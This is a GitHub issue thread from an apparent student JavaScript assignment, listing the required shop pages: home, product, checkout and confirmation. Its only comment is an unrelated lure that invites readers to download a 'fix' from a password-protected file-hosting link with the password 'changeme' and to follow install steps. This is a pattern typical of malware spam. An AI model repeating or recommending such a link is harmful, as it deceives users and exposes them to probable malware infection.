### ISSUE TITLE
Required pages - setup

### ISSUE THREAD

**Issue by Anne-Zwift** [Anne-Zwift/JavaScript-1-CA#2]
Required Pages
The following pages are required to complete this assignment.

You need to update each path in your current AC. Every page will have an index page inside a folder: Product/index.html

 

- [ ] Home Page containing product list /index.html
- [ ] Product Page showing all details of a specific product /product/index.html
- [ ] Checkout Page showing all items in the basket /checkout/index.html
- [ ] Confirmation Page showing a thank you message /checkout/confirmation/index.html

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
